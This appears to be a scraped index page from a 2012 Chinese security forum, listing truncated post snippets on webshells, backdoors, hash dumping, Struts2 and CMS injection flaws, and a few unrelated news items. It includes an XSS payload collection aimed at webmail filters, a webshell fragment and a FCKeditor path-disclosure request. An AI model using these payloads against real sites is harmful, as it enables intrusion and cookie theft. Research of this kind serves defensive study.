之前发的一篇,转过来。 Webshell的因素 我们从一个最简单的webshell结构可以看出其基本结构:“<?php eval($_POS
交换机里能否添加后门?
交换机里能否添加后门 also (白帽子) | 2012-12-17 20:06 某日看到一小说里,看到在交换机里放后门,然后各种yy,不知道这个能否实现。 交换机是可以远程上传文件的。
基于日志整理出的经常扫描的 IDC、ISP、IP段、AS号及web服务器内容
僵尸网络及肉鸡行为分析 根据防火墙爆破日志及CC攻击日志整理 郑州市景安计算机网络技术有限公司 ZhengZhou GIANT Computer Network Technology Co., Ltd AS号及地址范围:AS4837(联通
看新闻学知识之手机千里追回
看新闻学知识之手机千里追回 xsser (十根阳具有长短!!) | 2012-12-18 00:04 西安丢iPhone定位在北京民警辗转2400公里追回 亮点在 记住串号打开定位可帮你找回
西安丢iPhone定位在北京民警辗转2400公里追回
一部手机在西安被盗,后被定位显示在北京。西安市公安局莲湖分局土门派出所两名民警,连夜乘火车赶赴北京,辗转2400余公里追回被盗手机。12月1
来福士等试点室内定位技术
本报讯 (记者 章迪思)在昨天举行的上海位置服务技术创新战略高峰论坛通气会上,来自上海电信的有关专家透露,他们已经在来福士、东方商厦
Windows server 2012 用户hash抓取方法研究(本地+域)
Twi1ight 发表于 2012-11-21 10:17 在http://msdn.itellyou.cn/下载了一个windows server 2012 (64) - DVD (Chinese-Simplified),然
PHP后门生成工具weevely分析
唐门三少 发表于 2012-10-19 11:07 最近闲的蛋疼,玩了下weevely这个工具,感觉还是蛮强大的,防查杀,连接也是加密的。感兴趣的朋友看正文吧。 0x01 摘要 weev
PHP create_function()注入命令执行漏洞
winxwin 发表于 2012-9-16 21:39 在PHP中使用create_function()创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给cr
定位GFW的python脚本,如何找到GFW设备的IP地址
github上有人释出了一个python脚本mongol.py,可以定位中国防火长城的物理位置和数量。 mongol.py以密歇根大学计算机系
0day交易网站ExploitHub被入侵过程解析
昨日消息,Inj3ct0r团队称已经成功黑进了ExploitHub.com网站,盗取了价值$242333的私有漏洞利用代码。Inj3ct0r
通过HTTP参数污染绕过WAF拦截
译:pnig0s_小P 上个星期我被邀请组队去参加一个由CSAW组织的CTF夺旗比赛.因为老婆孩子的缘故,我只能挑一个与Web漏洞利用相关的题
PHP代码审计学习总结
唐门三少 发表于 2012-9-27 17:18 0x01 引言 PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界有超过34
Internet Explorer 9 XSS Filter Bypass
00截断之前貌似没接触过,但是字符集编码导致被绕过之前研究的很多。 (大家可以研究下某已经被补的预警!) ------------------------------------------------------------------- Insight-labs公布的一些方
视频:【恶搞配音】爆笑末日狂想曲《末日联播》!(淮秀帮出品)
视频:【恶搞配音】爆笑末日狂想曲——《末日联播》!(淮秀帮出品)
Struts2漏洞浅析之Ongl代码执行分析
唐门三少 发表于 2012-12-9 13:38 0x01 简述 2010年7月exploitdb爆出的《Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability》,可以称之为
利用WMI代替psexec——WMIEXEC.vbs
Twi1ight 发表于 2012-12-10 10:54 0x01 背景 内网渗透中经常用到psexec这个工具,可以很方便的得到一个半交互式的cmd shell。 但是psexec也有一些问题:ps
Struts2漏洞分析之Ognl表达式特性引发的新思路
唐门三少 发表于 2012-12-14 14:23 0x01 摘要 在Ognl表达式中,会将被括号“()”包含的变量内容当做Ognl表达式执行。Ognl表达式的这一特性,引发出一种新的
都是referer惹的祸
Posted on 2011/03/08 by 余弦(@evilcos)http://evilcos.me/ referer指请求来源,很多网站通过这个来判断用户从哪个页面/网站过来
XSS Hack:获取浏览器记住的明文密码
余弦(@evilcos) evilcos@gmail.com http://evilcos.me/ 本文书写时间早于:2012-02-10 0x01. XSS获取明文密码的多种方式 我已经感受到Web潮流带来的巨大革新,尤其是
利用 xss 执行 sql 注入
昨天看见phpcms v9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很
邮箱跨站代码收集
<script>alert("dddd")<script> <script>alert('test')</script> ----------------------------TOM------------------------------------------------------------------- <img src="http://www.google.cn/intl/zh-CN/images/logo_cn.gif" width=0 height=0 ononloadload="alert(52)">52 <img src="http://www.google.cn/intl/zh-CN/images/logo_cn.gif" width=0 height=0 onload="alert(53)">53 <img src="http://www.google.cn/intl/zh-CN/images/logo_cn.gif" width=0 height=0 /**/onload="alert(54)">54 <ba="<script>alert(55);</script>"55 <img/*****/src=# width=0 height=0 /***/onerror=alert(56)>56 <iframe/**/src=http://www.baidu.com>57</iframe> <img src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(58)>58 <image src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(59)>59 <style onreadystatechange=alert(60)>60</style> <xml onreadystatechange=alert(61)>xxxx</xml>61 <object type=image src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(62)>62 <img type=image src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(63)>63 <P STYLE="behavior:url('#default#time2')" onEnd=alert(64)>64 <P STYLE="behavior:url('#default#time2')" onBegin=alert(65)>65 <style><img src="</style><img src=x onerror=alert(66)//">66 ---------------------------------------------------------------------------------------------- <DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\002F\0078\0073\0073\002F\0029\0029"> <frameset onload=alert(1)> <IMG SRC="jav ascript:alert('XSS-1');"> <IMG """><SCRIPT>alert("XSS-2")</SCRIPT>"> Hello,80sec </xss style="x:expression(alert(document.cookie))"> <IMG SRC = " j
JWPlayer Xss 0day [Flash编程安全问题]
缺陷编号:WooYun-2012-07166 漏洞标题:JWPlayer Xss 0day [Flash编程安全问题] 相关厂商:LongTail Video 漏洞作者:g
flash_xss挖掘小谈
恶意的swf在iframe下能获取到swf所在域的cookies 对用户群体越多的网站危害越大了就,因为攻击很隐蔽 国内特别是QQ,BAIDU了
跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)
漏洞详情 披露状态: 2012-08-22: 细节已通知厂商并且等待厂商处理中 2012-08-23: 厂商已经确认,细节仅向
漫谈反射xss利用
晚上无聊,没打草稿,想到哪,写到哪,凑合看吧. 先打个作者:Y35U 1,反射xss威力大吗? 反射xss相比flashxss和存储xss要多多了
Finecms 1.7.2注射漏洞
漏洞文件: Client.Class.php 29行处 public static function get_user_ip() { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $onlineip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $onlineip = $_SERVER['REMOTE_ADDR']; } return $onlineip; } /* 显然可以伪造一个clien
FCKeditor爆绝对路径
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=C
蚂蚁php分类信息系统 mymps 4.0i utf版0Day
Team :CodePlay 原因: 老婆说自己月经怎么还不来呢,急死了。。。突然老婆月经来了。囧,这是事实。。。 老婆说:“你个屌丝,懂什么是月经么。”
淘客帝国最新免费版后台cookie欺骗
主题:淘客帝国最新免费版后台cookie欺骗 作者:孤心 偶然发现的淘客帝国免费版的后台可以cookie欺骗 工具:老兵的cookie'欺骗工具 关